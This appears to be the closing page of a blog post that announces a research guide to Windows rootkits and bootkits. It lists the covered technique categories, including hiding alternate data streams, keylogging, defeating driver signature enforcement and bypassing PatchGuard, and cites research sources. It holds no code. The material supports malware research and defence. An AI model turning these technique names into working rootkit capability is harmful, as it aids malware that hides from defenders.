Setting up itself as a filter driver and 4 sub-techniques
Using Windows kernel callbacks
Using and hiding NTFS Alternate Data Streams (ADS)
Keylogger
Windows IP Filtering
Disabling Windows kernel callbacks
The subject of bootkit infection with 4 sub-techniques
Defeating Driver Signature Enforcement (DSE) with 6 sub-techniques
14 other not categorized sub-techniques, including, disabling/bypassing PatchGuard

The following web resources made this document possible:

Malpedia | https://malpedia.caad.fkie.fraunhofer.de
MITRE ATT&CK® | https://attack.mitre.org/
KernelModeInfo forum | https://www.kernelmode.info/forum/
rootkit_com site mirror | https://github.com/claudiouzelac/rootkit.com/tree/master/
Virus Bulletin | https://www.virusbulletin.com/virusbulletin/

Also, the following studies are dedicated to the same purpose, i e summarizing information about Ring 0 malware:

An In-Depth Look at Windows Kernel Threats by Trend | https://documents.trendmicro.com/assets/white_papers/wp-an-in-depth-look-at-windows-kernel-threats.pdf
«Nice Boots!» - A Large-Scale Analysis of Bootkits and New Ways to Stop Them | https://publications.sba-research.org/publications/bootcamp_dimva_2015.pdf
Bootkit's development overview and trend | http://www.vxjump.net/files/seccon/bktrend.pdf
Bootkits: Past, Present & Future | https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-RodionovMatrosov.pdf
Positive Technologies | Bootkits: evolution and detection methods

The research details the following malware families.

Clickable

↧

The final post

September 19, 2024, 2:41 pm

≪ Previous: Windows Rootkits (and Bootkits) Guide v2

This blog is no longer active. For new posts,

https://aibaranov.github.io/

Contacts

https://linktr.ee/artem_i_baranov

https://github.com/ArtemBaranov/Misc

↧